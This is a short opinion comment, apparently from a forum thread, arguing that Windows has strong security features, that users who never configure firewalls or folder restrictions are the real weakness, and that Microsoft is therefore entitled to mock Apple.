And many others. Windows isn't exactly "inept" when it comes to security; in fact, in my opinion it is the strongest in this area, and Linux and other operating systems still have a long way to go to reach its level. The problem is simple: "the users". How many would bother to configure firewall rules or put restrictions on folders? Nobody. That's why I expect nobody to complain. Windows has the means, but not the people. So Microsoft has every right to mock Apple.